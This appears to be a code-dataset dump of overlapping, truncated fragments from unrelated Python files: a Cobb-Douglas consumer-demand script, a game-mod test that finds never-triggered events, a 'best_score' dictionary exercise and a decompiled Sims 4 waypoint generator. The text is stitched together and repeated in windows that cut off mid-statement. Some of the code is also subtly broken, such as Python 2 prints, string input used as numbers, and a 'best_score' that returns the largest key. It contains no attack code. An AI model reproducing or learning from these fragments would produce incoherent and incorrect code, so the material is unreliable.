Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals: ') import Consumer_class", "market prices of [x,y]: ') income=input('Please detemine the income of individual: ') par=input('Please", "price=input('Please detemine the market prices of [x,y]: ') income=input('Please detemine the income of", "[x,y]: ') income=input('Please detemine the income of individual: ') par=input('Please detemine the parameters", "income=input('Please detemine the income of individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]:", "of individual: ') par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the", "of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals: ') import Consumer_class Market_D=[0,0]", "par=input('Please detemine the parameters of Cobb-Doglous[alpha1,alpha2]: ') nper=input('Please determine the number of individuals:", "the number of individuals: ') import Consumer_class Market_D=[0,0] for i in range(nper): A=Consumer_class.Consumer(price,income,par)", "individuals: ') import Consumer_class Market_D=[0,0] for i in range(nper): A=Consumer_class.Consumer(price,income,par) Market_D+=A.utility_max() print Market_D", "') nper=input('Please determine the number of individuals: ') import Consumer_class Market_D=[0,0] for i", "of individuals: ') import Consumer_class Market_D=[0,0] for i in range(nper): A=Consumer_class.Consumer(price,income,par) Market_D+=A.utility_max() print", "nper=input('Please determine the number of individuals: ') import Consumer_class Market_D=[0,0] for i in", "number of individuals: ') import Consumer_class Market_D=[0,0] for i in range(nper): A=Consumer_class.Consumer(price,income,par) Market_D+=A.utility_max()" ]
[ "events are triggered from somewhere # If they not - they'll never be", "If they not - they'll never be triggered # By Pelmen, https://github.com/Pelmen323 ##########################", "https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events", "part triggered_events_id[event_id] = 0 # Default value is set to zero # 3.", "'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict() invoked_events_id =", "event in all_events: if \"is_triggered_only = yes\" in event: pattern_matches = re.findall('id =", "= re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match is", "used for event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results", "== 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr but are never", "is taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments", "event_id = event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] = 0 # Default", "files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if", "triggered_events_id[event] += 1 results = [i for i in triggered_events_id.keys() if triggered_events_id[i] ==", "check if \"is_triggered_only = yes\" events are triggered from somewhere # If they", "if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id =", "= pattern_matches[0].strip('\\t').strip() # Only first match is taken if '#' in event_id: event_id", "from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0']", "Get the \"triggered only events\" for event in all_events: if \"is_triggered_only = yes\"", "= [] triggered_events_id = dict() invoked_events_id = [] # 1. Get all events", "# Only first match is taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip()", "\"id =\" part triggered_events_id[event_id] = 0 # Default value is set to zero", "= Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered only events\" for event in", "triggered_events_id[event_id] = 0 # Default value is set to zero # 3. Get", "events have 'is_triggered_only = yes' attr but are never triggered from outside. Check", "set to zero # 3. Get all events triggered in files triggered_events_id =", "DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if events are used", "if \"is_triggered_only = yes\" in event: pattern_matches = re.findall('id = .*', event) event_id", "# Test script to check if \"is_triggered_only = yes\" events are triggered from", "[] triggered_events_id = dict() invoked_events_id = [] # 1. Get all events code", "0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr but are never triggered", "Clean up comments event_id = event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] =", "they not - they'll never be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import", "zero # 3. Get all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES)", "never be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import", "= DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if events are", "# If they not - they'll never be triggered # By Pelmen, https://github.com/Pelmen323", "from somewhere # If they not - they'll never be triggered # By", "ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1',", "=\" part triggered_events_id[event_id] = 0 # Default value is set to zero #", "+= 1 results = [i for i in triggered_events_id.keys() if triggered_events_id[i] == 0]", "'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id =", "'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict() invoked_events_id", "# 4. Check if events are used for event in invoked_events_id: if event", "in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for i in triggered_events_id.keys() if", "########################## # Test script to check if \"is_triggered_only = yes\" events are triggered", "event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] = 0 # Default value is", "= [] # 1. Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) #", "script to check if \"is_triggered_only = yes\" events are triggered from somewhere #", "be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner,", "3. Get all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id =", "they'll never be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class", "# 2. Get the \"triggered only events\" for event in all_events: if \"is_triggered_only", "Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if events are used for event in invoked_events_id:", "triggered from somewhere # If they not - they'll never be triggered #", "= event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] = 0 # Default value", "triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for i in triggered_events_id.keys() if triggered_events_id[i]", "event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i", "in event: pattern_matches = re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only", "event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip() # Remove", "code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered only events\" for", "yes\" in event: pattern_matches = re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() #", "[] # 1. Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2.", "events are used for event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] +=", "Test script to check if \"is_triggered_only = yes\" events are triggered from somewhere", "Only first match is taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() #", "if events are used for event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event]", "all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True)", "1. Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the", "comments event_id = event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] = 0 #", "first match is taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean", "to check if \"is_triggered_only = yes\" events are triggered from somewhere # If", "# Clean up comments event_id = event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id]", "in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes'", "'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict()", "'is_triggered_only = yes' attr but are never triggered from outside. Check console output\")", "i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only =", "\"triggered only events\" for event in all_events: if \"is_triggered_only = yes\" in event:", "= ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events =", "is set to zero # 3. Get all events triggered in files triggered_events_id", "= yes\" events are triggered from somewhere # If they not - they'll", "= 0 # Default value is set to zero # 3. Get all", "invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if events are used for event", "Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import", "yes\" events are triggered from somewhere # If they not - they'll never", "in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip() #", "import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1',", "\"is_triggered_only = yes\" in event: pattern_matches = re.findall('id = .*', event) event_id =", "= .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match is taken if", "if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr but", "'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id", "= yes\" in event: pattern_matches = re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip()", "are used for event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1", "# 1. Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get", "..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1',", "ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr but are never triggered from", "1 results = [i for i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results,", "triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr but are", "in all_events: if \"is_triggered_only = yes\" in event: pattern_matches = re.findall('id = .*',", "= Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if events are used for event in", "for event in all_events: if \"is_triggered_only = yes\" in event: pattern_matches = re.findall('id", "have 'is_triggered_only = yes' attr but are never triggered from outside. Check console", "[i for i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have", "event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip() # Remove \"id", "invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for i", "0 # Default value is set to zero # 3. Get all events", "event in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for i in triggered_events_id.keys()", "value is set to zero # 3. Get all events triggered in files", "for event in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results =", "Get all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner,", "from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2',", "import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner:", ".*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match is taken if '#'", "pattern_matches[0].strip('\\t').strip() # Only first match is taken if '#' in event_id: event_id =", "Check if events are used for event in invoked_events_id: if event in triggered_events_id.keys():", "# By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from", "object): all_events = [] triggered_events_id = dict() invoked_events_id = [] # 1. Get", "= dict() invoked_events_id = [] # 1. Get all events code all_events =", "for i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only", "triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events have 'is_triggered_only = yes' attr", "- they'll never be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re from", "Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered only events\" for event in all_events:", "re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1',", "if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for i in", "lowercase=True) # 2. Get the \"triggered only events\" for event in all_events: if", "# 3. Get all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id", "not - they'll never be triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re", "invoked_events_id = [] # 1. Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True)", "events\" for event in all_events: if \"is_triggered_only = yes\" in event: pattern_matches =", "match is taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up", "# Remove \"id =\" part triggered_events_id[event_id] = 0 # Default value is set", "\"is_triggered_only = yes\" events are triggered from somewhere # If they not -", "..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def", "only events\" for event in all_events: if \"is_triggered_only = yes\" in event: pattern_matches", "dict() invoked_events_id = [] # 1. Get all events code all_events = Events.get_all_events(test_runner=test_runner,", "lowercase=True) # 4. Check if events are used for event in invoked_events_id: if", "all_events = [] triggered_events_id = dict() invoked_events_id = [] # 1. Get all", "to zero # 3. Get all events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id,", "events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered only events\"", "triggered_events_id = dict() invoked_events_id = [] # 1. Get all events code all_events", "'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict() invoked_events_id = []", "are triggered from somewhere # If they not - they'll never be triggered", "pattern_matches = re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match", "########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES", "event: pattern_matches = re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first", "false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if events are used for", "triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check if events", "FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events", "somewhere # If they not - they'll never be triggered # By Pelmen,", "up comments event_id = event_id[5:].strip() # Remove \"id =\" part triggered_events_id[event_id] = 0", "= event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip() # Remove \"id =\"", "events triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) #", "event_id = pattern_matches[0].strip('\\t').strip() # Only first match is taken if '#' in event_id:", "import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES =", "triggered in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4.", "Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object):", "in invoked_events_id: if event in triggered_events_id.keys(): triggered_events_id[event] += 1 results = [i for", "event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match is taken if '#' in", "in files triggered_events_id = DataCleaner.clear_false_positives(input_iter=triggered_events_id, false_positives=FALSE_POSITIVES) invoked_events_id = Events.get_all_triggered_events_names(test_runner=test_runner, lowercase=True) # 4. Check", "re.findall('id = .*', event) event_id = pattern_matches[0].strip('\\t').strip() # Only first match is taken", "taken if '#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id", "Remove \"id =\" part triggered_events_id[event_id] = 0 # Default value is set to", "Get all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered", "# Default value is set to zero # 3. Get all events triggered", "message=\"Those events have 'is_triggered_only = yes' attr but are never triggered from outside.", "if \"is_triggered_only = yes\" events are triggered from somewhere # If they not", "DataCleaner, ResultsReporter from ..test_classes.events_class import Events FALSE_POSITIVES = ['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1',", "By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter from ..test_classes.events_class", "Default value is set to zero # 3. Get all events triggered in", "'#' in event_id: event_id = event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip()", "def test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict() invoked_events_id = [] #", "the \"triggered only events\" for event in all_events: if \"is_triggered_only = yes\" in", "event_id[:event_id.index('#')].strip() # Clean up comments event_id = event_id[5:].strip() # Remove \"id =\" part", "all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered only events\" for event", "all_events: if \"is_triggered_only = yes\" in event: pattern_matches = re.findall('id = .*', event)", "2. Get the \"triggered only events\" for event in all_events: if \"is_triggered_only =", "triggered # By Pelmen, https://github.com/Pelmen323 ########################## import re from ..test_classes.generic_test_class import DataCleaner, ResultsReporter", "4. Check if events are used for event in invoked_events_id: if event in", "test_check_triggered_events(test_runner: object): all_events = [] triggered_events_id = dict() invoked_events_id = [] # 1.", "= [i for i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those events", "['ace_promoted.1', 'ace_promoted.2', 'ace_died.1', 'ace_killed_by_ace.1', 'ace_killed_other_ace.1', 'aces_killed_each_other.1', 'nuke_dropped.0'] def test_check_triggered_events(test_runner: object): all_events = []", "results = [i for i in triggered_events_id.keys() if triggered_events_id[i] == 0] ResultsReporter.report_results(results=results, message=\"Those", "all events code all_events = Events.get_all_events(test_runner=test_runner, lowercase=True) # 2. Get the \"triggered only" ]
[ "#!/usr/bin/python3 def best_score(a_dictionary): if a_dictionary is None or a_dictionary == {}: return n", "best_score(a_dictionary): if a_dictionary is None or a_dictionary == {}: return n = []", "def best_score(a_dictionary): if a_dictionary is None or a_dictionary == {}: return n =", "or a_dictionary == {}: return n = [] for new in a_dictionary: n.append(new)", "<reponame>flourishcodes/holbertonschool-higher_level_programming<filename>0x04-python-more_data_structures/10-best_score.py<gh_stars>0 #!/usr/bin/python3 def best_score(a_dictionary): if a_dictionary is None or a_dictionary == {}: return", "is None or a_dictionary == {}: return n = [] for new in", "None or a_dictionary == {}: return n = [] for new in a_dictionary:", "a_dictionary is None or a_dictionary == {}: return n = [] for new", "a_dictionary == {}: return n = [] for new in a_dictionary: n.append(new) return", "if a_dictionary is None or a_dictionary == {}: return n = [] for", "== {}: return n = [] for new in a_dictionary: n.append(new) return max(n)" ]
[ "uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9", "maximum number of waypoints to visit. Set to 0 to keep going until", "waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph,", "**kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph,", "chosen from waypoint graph for waypoint id {}.', prev_waypoint) break num_visited += 1", "return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim) if self.ending_waypoint is not", "{}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint if cur_waypoint == ending_waypoint: break", "new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint", "import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable", "self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint = self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def", "import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the", "at (will choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the", "name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size of source mod 2**32:", "[MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at:", "# Compiled at: 2020-04-22 01:40:18 # Size of source mod 2**32: 3643 bytes", "from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n", "connections is None: logger.warn('No connections defined in waypoint graph for waypoint id {}.',", "SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import", "# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\routing\\waypoints\\waypoint_generator_connected_points.py # Compiled at: 2020-04-22 01:40:18 # Size of", "choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to", "Set to 0 to keep going until ending_waypoint is reached.\\n ', tunable_type=int, default=0,", "01:40:18 # Size of source mod 2**32: 3643 bytes import sims4 from event_testing.resolver", "(3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900", "of waypoints to visit. Set to 0 to keep going until ending_waypoint is", "ending_waypoint is reached.\\n ', tunable_type=int, default=0, minimum=0, maximum=100)} def __init__(self, *args, **kwargs): (super().__init__)(*args,", "cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited = 0 while num_visited < self.max_waypoints", "# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64", "Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit", "waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if", "on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end at (will", "_WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n", "resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint prev_waypoint = None num_visited =", "= new_waypoint if cur_waypoint is None: logger.warn('No connection chosen from waypoint graph for", "from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]", "2020-04-22 01:40:18 # Size of source mod 2**32: 3643 bytes import sims4 from", "TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints',", "(will choose one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator", "id {}.', prev_waypoint) break num_visited += 1 yield waypoint_constraint if cur_waypoint == ending_waypoint:", "prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No connection", "self.starting_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver =", "to visit. Set to 0 to keep going until ending_waypoint is reached.\\n ',", "while num_visited < self.max_waypoints or self.max_waypoints == 0: connections = self.waypoint_graph.connections.get(cur_waypoint, None) if", "import _WaypointGeneratorBase from sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES", "ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint = None cur_waypoint = self._starting_waypoint", "*args, **kwargs): (super().__init__)(*args, **kwargs) self._sim = self._context.sim resolver = SingleSimResolver(self._sim) self._starting_waypoint, self._start_constraint =", "cur_waypoint cur_waypoint = new_waypoint if cur_waypoint is None: logger.warn('No connection chosen from waypoint", "import sims4 from event_testing.resolver import SingleSimResolver from routing.waypoints.tunable_waypoint_graph import TunableWaypointGraphSnippet, TunableWaypointWeightedSet from routing.waypoints.waypoint_generator", "one based on the tests/weights).\\n '), 'ending_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to end", "self._routing_surface, resolver) def get_start_constraint(self): return self._start_constraint def get_waypoint_constraints_gen(self, routing_agent, waypoint_count): resolver = SingleSimResolver(self._sim)", "None: logger.warn('No connection chosen from waypoint graph for waypoint id {}.', prev_waypoint) break", "connections between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for the generator to start at (will", "waypoints to visit. Set to 0 to keep going until ending_waypoint is reached.\\n", "sims4.tuning.tunable import TunableRange logger = sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines", "'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to visit. Set to 0 to keep", "to end at (will choose one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The", "for the generator to start at (will choose one based on the tests/weights).\\n", "one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number of waypoints to", "sims4.log.Logger('WaypointGeneratorConnectedPoints', default_owner='miking') class _WaypointGeneratorConnectedPoints(_WaypointGeneratorBase): FACTORY_TUNABLES = {'waypoint_graph':TunableWaypointGraphSnippet(description='\\n Defines the waypoints and connections between", "= connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint) prev_waypoint = cur_waypoint cur_waypoint = new_waypoint if cur_waypoint", "if cur_waypoint is None: logger.warn('No connection chosen from waypoint graph for waypoint id", "at (will choose one based on the tests/weights).\\n '), 'max_waypoints':TunableRange(description='\\n The maximum number", "self.ending_waypoint is not None: ending_waypoint, _ = self.ending_waypoint.choose(self.waypoint_graph, self._routing_surface, resolver) else: ending_waypoint =", "for waypoint id {}.', cur_waypoint) break new_waypoint, waypoint_constraint = connections.choose(self.waypoint_graph, self._routing_surface, resolver, prev_waypoint)", "3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC", "between them.\\n '), 'starting_waypoint':TunableWaypointWeightedSet.TunableFactory(description='\\n Waypoint for 